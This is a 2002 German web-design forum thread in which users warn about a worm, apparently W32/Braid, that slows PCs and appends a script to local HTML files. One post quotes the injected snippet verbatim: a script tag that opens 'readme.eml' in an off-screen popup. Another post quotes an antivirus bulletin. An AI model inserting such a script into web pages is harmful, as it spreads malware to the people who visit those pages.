Vollständigen Link anzeigen: javarea.de Forum > Talk Talk > na hier virusartig ne?
| geschrieben von Gast am 13.11.2002 - 21:20 |
| Liebe Forum Gemeinde! (Javarea, Sunrock) Ich gebe hiermit eine Viruswarnung herraus. Dieser Virus, wie auch immer er heissen mag, ist was ganz fieses für uns Webdesigner. Er beschädigt nicht direkt... verlangsamt nur alles und packt die HDD zu. Zur Beschreibung: Es wird sich irgendwo auf der Festplatte eine Datei Namens readme.eml - wie Outlook Email niederlassen. Ob man diese Datei aufrufen muss oder nicht, weiss ich nicht. Ich kann mich nicht erinnern, es gemacht zu haben und trotzdem bin ich betroffen. Wie auch immer - zum weiteren Verlauf. Diese Datei sucht sich alle HTML/HTM Dateien auf der Festplatte herraus und setzt folgendes an das Ende des Quellcodes: (kopiert sich automatisch in den grundordner, wo die htm liegt) <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> Es wird sich ein Popup öffnen, in welchem sich die readme.eml wieder öffnet um sich weiter zu verbreiten. Dadurch wird alles lahmgelegt... das normale arbeiten mit dem Rechner ist nicht mehr möglich, da es alle Prozesse verlangsamt. Wie Ihr euch dagegen schützen könnt - nur Gott weiss es... *g* aber ich noch nicht. Ich habe meine suchmaschiene hier unter Windoof angeschmissen und alle readme.eml 's gelöscht. jetzt öffnet sich das Popup nur noch mit na error404 seite. Das blöde ist halt, wenn man viele html datein hat, dass man ganz bestimmt nicht Lust hat, immer diese JS anweisung da rauszuhaun. Ich hoffe es trifft euch nicht auch, euer timmi |
| geschrieben von Gast am 13.11.2002 - 22:26 |
| das is jetzt echt kein witz. ich kann nicht mehr mit meinem rechner arbeiten und stehe nun vor winneuinstallation nr. 4 in einer woche. also seht euch vor. *totaldekriesehab* das ärgerliche is halt blos, dass ich irgendwie auch ma die andre partition säubern muss, die ich sonst nie mit formatiert habe. mit all meinen files und das sucks.,.. nunja... bye then... - bis zur nächsten windumm session ;) euer timmi ps: das wird dann dazu führen, dass ihr mic in den nästen tagen ma nich ertragen müsst *g* werdet ihr mich vermissen? ;) *loL* und an MARSTERM: das wirds wahrscheinlich gewesen sien, was dein norton da imma so schön gemeldet hat. also you better watch yourself. ;) wenns dir schadet - dann ein fettes sorry - na du weisst schon, weil du ja auf meinem rechner druwarst... |
| geschrieben von Daniel am 13.11.2002 - 22:52 |
| Danek für die Info Timmi |
| geschrieben von Patricia am 14.11.2002 - 00:13 |
| wie fängt man es sich ein??? |
| geschrieben von Gast am 14.11.2002 - 00:54 |
| ich habe das dumme bedenken, dass es mal wieder eine outlook lücke ist. ich habe in der zeit davor emails bekommen, betitelt mit verschiedenen themen, die im forum der javarea und meinem/bielweb forum aufgetreten sind, und wo ich was zu geschrieben habe. nunja diese emails waren leer, bis auf eine txt datei, die sich automatisch, wie na art download startete. es hat keinen sinn die datein zu löschen - sie sind wieder da *G* hier mal ein bild mit meiner suchabfrage - das is wirklich kein scherz das ding. ich habe bisher, wenn ich neu installiert habe, immer meinen outlook ordner mit allen emails übernommen (auf na andern partition gelagert.) ich denke ich werde jetzt wirklich ALLES blank machen müssen... achso: die im anhang gezeigten 49 datein oder so *G* das is nur ein bruchteil von dem, was im ersten durchgang da war. also an alle anderen: andere warnen und mit outlook aufpassen. bild unter: http://www.timmel.info/umfrage/virus.jpg |
| geschrieben von Daniel am 14.11.2002 - 01:01 |
| Ob die das nie geregelt bekommen??? Klausi wo wor wieder beim Thema sicherheit sind ^^ ;) Also eigentlich ist man mehr damit beschäftig den Rechner fit und sicher zu halten als mit arbeiten ( bischen übertrieben, aber egal ).. Microsoft is schon goil. Klaus is das bei Linux auch so ein Dreck?? |
| geschrieben von Patricia am 14.11.2002 - 01:09 |
| da der scheiss mir keine Ruh lies udn Trojaner info nix her gab hab ich das bei Frank gefunden ( hoax-info.de ) November 2002 W32/Braid (04.11.) * wenig verbreitet * Alias: W32.Brid@mm, Win32.Braid.A, I-Worm.Bridex, PE_BRID.A Typ: EXE (Win32), Wurm, Virus-Dropper Verbreitung: E-Mail (readme.exe, ~112 KB) Betreff/Subject: verschieden (praktisch beliebig, auch deutsch) Nachricht: (HTML, variabel), z.B.: Hello, Product Name: <Windows-Version> Product Id: <Windows-Seriennummer> Process List: <Liste laufender Prozesse> Anhang: readme.exe, ~112 KB (nutzt IFrame.Exploit) Symptome: u.a. Existenz der Dateien bride.exe im Windows-System-Verz. sowie Help.eml und Explorer.exe auf dem Desktop Schaden: E-Mail-Versand, schleust Dateivirus W32/Funlove ein (bride.exe) Rechner wird sehr langsam, bis hin zum Stillstand Info: CAI | F-Secure | Kaspersky AV/AVP | NAI/McAfee | Sophos | Symantec | Trend Micro Na schnackelts? |
| geschrieben von Gast am 14.11.2002 - 01:14 |
| das isset. blos halt ein wenig andre form aber die symtomme stimmen - meiner steht gleich *g* das kann man nicht mehr langsam nennen *G* ansonsten modifiziert er halt html und htm datein und ist nur in ordner (soweit ich das einschätzen kann), wo htm html drin is. aber bitte am ball bleiben das is n shit.. wo kommt der nun her? hab NIE ne exe oder sowat downgeloadet.... hehe die vermehren sich schneller als bakterien die dinger *G* hab statt 49 jetzt 55 *g* ohne irgendwas gemacht zu haben ... |
| geschrieben von Gast am 14.11.2002 - 01:16 |
| *grad gecheckt hab* KEINE bride.exe im systemverzeichnis und KEINE exploerer.exe aufm desktop. als so ziemlich gleich blos abgewandelt. |
| geschrieben von Gast am 14.11.2002 - 08:43 | ||||
hi, nein geschadet hats mir (noch) nicht....zum glück  |